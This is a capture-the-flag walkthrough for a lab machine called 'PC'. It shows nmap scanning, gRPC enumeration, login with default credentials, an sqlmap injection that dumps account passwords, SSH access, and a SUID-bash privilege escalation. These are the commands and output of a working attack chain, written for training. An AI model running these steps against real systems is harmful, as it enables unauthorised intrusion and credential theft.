PC

1. Initial recon

1.1. nmap

nmap -p- 10.10.11.214 -Pn

PORT      STATE SERVICE
22/tcp    open  ssh
50051/tcp open  unknown

2. user.txt

2.1. gRPC

A google search for port 50051 reveals that this port is generally used for gRPC.

Following this blog post I can start to find out how to enumerate gRPC.

Using grpcurl we can see that there is a service called SimpleApp running

./grpcurl --plaintext 10.10.11.214:50051 list
SimpleApp
grpc.reflection.v1alpha.ServerReflection

and that the app has 3 pages.

./grpcurl --plaintext 10.10.11.214:50051 list SimpleApp        
SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo

now let's use grpcui to have a web ui for the application

./grpcui -plaintext 10.10.11.214:50051 
gRPC Web UI available at http://127.0.0.1:36185/

If we try to use the getInfo option we get the following output

{
  "message": "Authorization Error.Missing 'token' header"
}

so, we may need to use the RegisterUser and then LoginUser functions to get our token

if we try to make a user with the name admin we get an error saying that the user already exists, however, we can use the credentials admin:admin with the LoginUser function and generate a token. taking note of the id and token we are given, let's use them with the getInfo function and see what we get

{
  "message": "Will update soon."
}

let's try some other numbers like, 1

Unexpected <class 'TypeError'>: 'NoneType' object is not subscriptable

time to do some research

2.2. SQLmap

This medium article talks about how SQLi might be a vulnerability when dealing with gRPC, so let's capture a request to a call to the getInfo function using BurpSuite and see if sqlmap can do anything for us.

sqlmap -r req.txt -dbs --batch

[INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')

sqlmap -r req.txt --tables --batch

[INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[INFO] fetching tables for database: 'SQLite_masterdb'
<current>
[2 tables]
+----------+
| accounts |
| messages |
+----------+

sqlmap -r req.txt -T accounts --batch --dump

Table: accounts
[2 entries]
+------------------------+----------+
| password               | username |
+------------------------+----------+
| admin                  | admin    |
| HereIsYourPassWord1431 | sau      |
+------------------------+----------+

We can use the credentials sau:HereIsYourPassWord1431 to ssh into the machine for the user flag

3. root.txt

Running a command to check for SUID binaries: find / -type f -perm -04000 -ls 2>/dev/null we can see that bash is there. so simply run /usr/bin/bash -p for root!

PreviousOptimumNextReturn

Was this helpful?